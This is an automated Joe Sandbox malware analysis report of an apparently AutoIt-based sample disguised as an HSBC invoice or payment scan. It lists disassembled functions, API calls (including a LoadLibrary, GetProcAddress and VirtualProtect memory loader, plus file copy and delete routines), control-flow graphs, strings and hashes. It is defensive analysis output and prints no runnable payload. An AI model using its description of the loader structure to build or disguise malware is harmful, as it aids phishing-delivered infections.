                    • Opcode ID: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                    • Instruction ID: 5c456aaff0bc52bfd145af91423283ccb1728dd9e24018bf26a135a76a273029
                    • Opcode Fuzzy Hash: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                    • Instruction Fuzzy Hash: 9541E8B1104149B7DF24BB38DC09BBE3794EB12700F142529F90DF62A2EAA19A45B763
                    Function 00E84AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1004 e84afe-e84b5e call e877c7 GetVersionExW call e87d2c 1009 e84c69-e84c6b 1004->1009 1010 e84b64 1004->1010 1011 ebdb90-ebdb9c 1009->1011 1012 e84b67-e84b6c 1010->1012 1013 ebdb9d-ebdba1 1011->1013 1014 e84c70-e84c71 1012->1014 1015 e84b72 1012->1015 1017 ebdba3 1013->1017 1018 ebdba4-ebdbb0 1013->1018 1016 e84b73-e84baa call e87e8c call e87886 1014->1016 1015->1016 1026 ebdc8d-ebdc90 1016->1026 1027 e84bb0-e84bb1 1016->1027 1017->1018 1018->1013 1020 ebdbb2-ebdbb7 1018->1020 1020->1012 1022 ebdbbd-ebdbc4 1020->1022 1022->1011 1024 ebdbc6 1022->1024 1028 ebdbcb-ebdbce 1024->1028 1029 ebdca9-ebdcad 1026->1029 1030 ebdc92 1026->1030 1027->1028 1031 e84bb7-e84bc2 1027->1031 1032 e84bf1-e84c08 GetCurrentProcess IsWow64Process 1028->1032 1033 ebdbd4-ebdbf2 1028->1033 1038 ebdc98-ebdca1 1029->1038 1039 ebdcaf-ebdcb8 1029->1039 1034 ebdc95 1030->1034 1035 e84bc8-e84bca 1031->1035 1036 ebdc13-ebdc19 1031->1036 1040 e84c0a 1032->1040 1041 e84c0d-e84c1e 1032->1041 1033->1032 1037 ebdbf8-ebdbfe 1033->1037 1034->1038 1042 ebdc2e-ebdc3a 1035->1042 1043 e84bd0-e84bd3 1035->1043 1046 ebdc1b-ebdc1e 1036->1046 1047 ebdc23-ebdc29 1036->1047 1044 ebdc08-ebdc0e 1037->1044 1045 ebdc00-ebdc03 1037->1045 1038->1029 1039->1034 1048 ebdcba-ebdcbd 1039->1048 1040->1041 1049 e84c89-e84c93 GetSystemInfo 1041->1049 1050 e84c20-e84c30 call e84c95 1041->1050 1054 ebdc3c-ebdc3f 1042->1054 1055 ebdc44-ebdc4a 1042->1055 1051 ebdc5a-ebdc5d 1043->1051 1052 e84bd9-e84be8 1043->1052 1044->1032 1045->1032 1046->1032 1047->1032 1048->1038 1053 e84c56-e84c66 1049->1053 1063 e84c7d-e84c87 GetSystemInfo 1050->1063 1064 e84c32-e84c3f call e84c95 1050->1064 1051->1032 1057 ebdc63-ebdc78 1051->1057 1058 ebdc4f-ebdc55 1052->1058 1059 e84bee 1052->1059 1054->1032 1055->1032 1061 ebdc7a-ebdc7d 1057->1061 1062 ebdc82-ebdc88 1057->1062 1058->1032 1059->1032 1061->1032 1062->1032 1066 e84c47-e84c4b 1063->1066 1069 e84c41-e84c45 GetNativeSystemInfo 1064->1069 1070 e84c76-e84c7b 1064->1070 1066->1053 1068 e84c4d-e84c50 FreeLibrary 1066->1068 1068->1053 1069->1066 1070->1069
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00E84B2B
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • GetCurrentProcess.KERNEL32(?,00F0FAEC,00000000,00000000,?), ref: 00E84BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00E84BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E84C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00E84C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E84C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E84C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                    • Instruction ID: e4433e16a8e8382cadb4df4ff79d8714ca836751c5677e6551bfb339e9f37e38
                    • Opcode Fuzzy Hash: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                    • Instruction Fuzzy Hash: CE91E57154EBC5DEC731EB6888511EBFFE4AF26304B48595ED0CFA3A41D224E908D719
                    Function 00E84FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1071 e84fe9-e84ff7 1072 e84fff-e85001 1071->1072 1073 e85021-e85026 1072->1073 1074 e85003-e8501a FindResourceExW 1072->1074 1075 ebdd5c-ebdd6b LoadResource 1074->1075 1076 e85020 1074->1076 1075->1076 1077 ebdd71-ebdd7f SizeofResource 1075->1077 1076->1073 1077->1076 1078 ebdd85-ebdd90 LockResource 1077->1078 1078->1076 1079 ebdd96-ebddb4 1078->1079 1079->1076
                    APIs
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E84EEE,?,?,00000000,00000000), ref: 00E85010
                    • LoadResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD75
                    • LockResource.KERNEL32(N,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F,00000000), ref: 00EBDD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SCRIPT$N
                    • API String ID: 3473537107-3852340653
                    • Opcode ID: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                    • Instruction ID: cff976cf2645bb55c9c9d56331425d1561372678e3c958ad07f466362d94e118
                    • Opcode Fuzzy Hash: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                    • Instruction Fuzzy Hash: CA119A75200704AFD7319B65DC48F677BB9FBC9B11F208568F40AA6660DB61E8049660
                    Function 00FB20A0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1142 fb20a0-fb20ad 1143 fb20ba-fb20bf 1142->1143 1144 fb20c1 1143->1144 1145 fb20c3 1144->1145 1146 fb20b0-fb20b5 1144->1146 1147 fb20c8-fb20ca 1145->1147 1148 fb20b6-fb20b8 1146->1148 1149 fb20cc-fb20d1 1147->1149 1150 fb20d3-fb20d7 1147->1150 1148->1143 1148->1144 1149->1150 1151 fb20d9 1150->1151 1152 fb20e4-fb20e7 1150->1152 1153 fb20db-fb20e2 1151->1153 1154 fb2103-fb2108 1151->1154 1155 fb20e9-fb20ee 1152->1155 1156 fb20f0-fb20f2 1152->1156 1153->1152 1153->1154 1157 fb211b-fb211d 1154->1157 1158 fb210a-fb2113 1154->1158 1155->1156 1156->1147 1161 fb211f-fb2124 1157->1161 1162 fb2126 1157->1162 1159 fb218a-fb218d 1158->1159 1160 fb2115-fb2119 1158->1160 1163 fb2192-fb2195 1159->1163 1160->1162 1161->1162 1164 fb2128-fb212b 1162->1164 1165 fb20f4-fb20f6 1162->1165 1166 fb2197-fb2199 1163->1166 1167 fb212d-fb2132 1164->1167 1168 fb2134 1164->1168 1169 fb20f8-fb20fd 1165->1169 1170 fb20ff-fb2101 1165->1170 1166->1163 1171 fb219b-fb219e 1166->1171 1167->1168 1168->1165 1172 fb2136-fb2138 1168->1172 1169->1170 1173 fb2155-fb2164 1170->1173 1171->1163 1174 fb21a0-fb21bc 1171->1174 1175 fb213a-fb213f 1172->1175 1176 fb2141-fb2145 1172->1176 1177 fb2166-fb216d 1173->1177 1178 fb2174-fb2181 1173->1178 1174->1166 1179 fb21be 1174->1179 1175->1176 1176->1172 1180 fb2147 1176->1180 1177->1177 1181 fb216f 1177->1181 1178->1178 1182 fb2183-fb2185 1178->1182 1183 fb21c4-fb21c8 1179->1183 1184 fb2149-fb2150 1180->1184 1185 fb2152 1180->1185 1181->1148 1182->1148 1186 fb21ca-fb21e0 LoadLibraryA 1183->1186 1187 fb220f-fb2212 1183->1187 1184->1172 1184->1185 1185->1173 1188 fb21e1-fb21e6 1186->1188 1189 fb2215-fb221c 1187->1189 1188->1183 1190 fb21e8-fb21ea 1188->1190 1191 fb221e-fb2220 1189->1191 1192 fb2240-fb2270 VirtualProtect * 2 1189->1192 1196 fb21ec-fb21f2 1190->1196 1197 fb21f3-fb2200 GetProcAddress 1190->1197 1193 fb2233-fb223e 1191->1193 1194 fb2222-fb2231 1191->1194 1195 fb2274-fb2278 1192->1195 1193->1194 1194->1189 1195->1195 1198 fb227a 1195->1198 1196->1197 1199 fb2209 ExitProcess 1197->1199 1200 fb2202-fb2207 1197->1200 1200->1188
                    APIs
                    • LoadLibraryA.KERNEL32(?), ref: 00FB21DA
                    • GetProcAddress.KERNEL32(?,00FABFF9), ref: 00FB21F8
                    • ExitProcess.KERNEL32(?,00FABFF9), ref: 00FB2209
                    • VirtualProtect.KERNELBASE(00E80000,00001000,00000004,?,00000000), ref: 00FB2257
                    • VirtualProtect.KERNEL32(00E80000,00001000), ref: 00FB226C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                    • String ID:
                    • API String ID: 1996367037-0
                    • Opcode ID: c5fe43d91b6ab9f559c988ac173efc20032336a598bb2d9bfb2c9c11908bbc94
                    • Instruction ID: e91ab2ffe7881758ab1104ce7d86546ad3439981acbc7bbd02a505e62621c538
                    • Opcode Fuzzy Hash: c5fe43d91b6ab9f559c988ac173efc20032336a598bb2d9bfb2c9c11908bbc94
                    • Instruction Fuzzy Hash: 88513672A443525BD7609ABDCCC07E5B7A0EB163747280738DAE2C73C6E7A45906EF60
                    Function 00EE4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00EBE7C1), ref: 00EE46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00EE46B7
                    • FindClose.KERNEL32(00000000), ref: 00EE46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                    • Instruction ID: 14dec30f42ce9f6a9c476b8eae8c88fb7d0a1632de6d485b388d318187d8370a
                    • Opcode Fuzzy Hash: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                    • Instruction Fuzzy Hash: 35E020714104095BC220B738EC4D8EA775CEE06335F100715F935D14E0E7B06D5495D5
                    Function 00E8E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    • Variable must be of type 'Object'., xrefs: 00EC428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: f534de0c19ec5a8a97e3ed7972cd7e42ed93b428ac8b00ae65f8c3aa2d95aa87
                    • Instruction ID: 65a8c775409c65bb778a097fc106ba07005840e957becf70f622aa0eaf964e83
                    • Opcode Fuzzy Hash: f534de0c19ec5a8a97e3ed7972cd7e42ed93b428ac8b00ae65f8c3aa2d95aa87
                    • Instruction Fuzzy Hash: F3A28A74A00209CFCB24EF98C580AAAB7B1FF59304F249069E91EBB351D771ED42CB91
                    Function 00E90B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90BBB
                    • timeGetTime.WINMM ref: 00E90E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90FB3
                    • TranslateMessage.USER32(?), ref: 00E90FC7
                    • DispatchMessageW.USER32(?), ref: 00E90FD5
                    • Sleep.KERNEL32(0000000A), ref: 00E90FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E9105A
                    • DestroyWindow.USER32 ref: 00E91066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E91080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00EC52AD
                    • TranslateMessage.USER32(?), ref: 00EC608A
                    • DispatchMessageW.USER32(?), ref: 00EC6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EC60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: 78348a49e0e19dd2d96f074f93222c0686856266fde7ae94b953011fdb0b240d
                    • Instruction ID: a2a77bbe0a92ee2f69b50c664ac191c43710199179107478d33d7346d5e1d3da
                    • Opcode Fuzzy Hash: 78348a49e0e19dd2d96f074f93222c0686856266fde7ae94b953011fdb0b240d
                    • Instruction Fuzzy Hash: 4FB2F471608741DFDB28DF24C984FAAB7E4FF84308F14591DE49AA72A1DB71E885CB42
                    Function 00EE93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00EE91E9: __time64.LIBCMT ref: 00EE91F3
                      • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                    • __wsplitpath.LIBCMT ref: 00EE94BE
                      • Part of subcall function 00EA432E: __wsplitpath_helper.LIBCMT ref: 00EA436E
                    • _wcscpy.LIBCMT ref: 00EE94D1
                    • _wcscat.LIBCMT ref: 00EE94E4
                    • __wsplitpath.LIBCMT ref: 00EE9509
                    • _wcscat.LIBCMT ref: 00EE951F
                    • _wcscat.LIBCMT ref: 00EE9532
                      • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9268
                      • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9277
                    • _wcscmp.LIBCMT ref: 00EE9479
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE96DC
                    • _wcsncpy.LIBCMT ref: 00EE974F
                    • DeleteFileW.KERNEL32(?,?), ref: 00EE9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EE979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: c29f64215e91196d3dc0f447a51f26792e29c9cb1ef8bc56eb9cc942447498b2
                    • Instruction ID: cc9e2c2aa72aafb2be144ae738e2ed6b79fbf5b1b936f633bf538dab8ebab570
                    • Opcode Fuzzy Hash: c29f64215e91196d3dc0f447a51f26792e29c9cb1ef8bc56eb9cc942447498b2
                    • Instruction Fuzzy Hash: 0BC12CB1D0021DAADF21DF95CC85ADEB7FDAF49310F0050AAF609F6152EB709A848F65
                    Function 00E871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F462F8,?,00E837C0,?), ref: 00E84882
                      • Part of subcall function 00EA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E872C5), ref: 00EA0771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E87308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EBECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EBED32
                    • RegCloseKey.ADVAPI32(?), ref: 00EBED70
                    • _wcscat.LIBCMT ref: 00EBEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 7ab9c6197bee1cfda35b6985905511e8b6f6d0b5c50219340b95a54278885c2a
                    • Instruction ID: b5b10875f8817b1c7f1af7063a176181079f7dc386698c7d8d036140da1737ba
                    • Opcode Fuzzy Hash: 7ab9c6197bee1cfda35b6985905511e8b6f6d0b5c50219340b95a54278885c2a
                    • Instruction Fuzzy Hash: ED716E755083059EC314FF65DC8189BBBE8FF59740B40542EF849A72A1DBB0DA48DF92
                    Function 00E83A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                    • LoadIconW.USER32(00000063), ref: 00E83A88
                    • LoadIconW.USER32(000000A4), ref: 00E83A9A
                    • LoadIconW.USER32(000000A2), ref: 00E83AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                    • RegisterClassExW.USER32(?), ref: 00E83B28
                      • Part of subcall function 00E83041: GetSysColorBrush.USER32(0000000F), ref: 00E83074
                      • Part of subcall function 00E83041: RegisterClassExW.USER32(00000030), ref: 00E8309E
                      • Part of subcall function 00E83041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                      • Part of subcall function 00E83041: LoadIconW.USER32(000000A9), ref: 00E830F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                    • String ID: #$0$AutoIt v3
                    • API String ID: 2880975755-4155596026
                    • Opcode ID: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                    • Instruction ID: 98c1ba6c66f1700368dc6a796a8ffafb5afbf95dce3753cce8cd283ae86c4781
                    • Opcode Fuzzy Hash: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                    • Instruction Fuzzy Hash: 7A211975900308BFEF10DFA4EC09B9D7BB4FB1A711F00412AE904E62A0D3BA5654AF96
                    Function 00E83778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
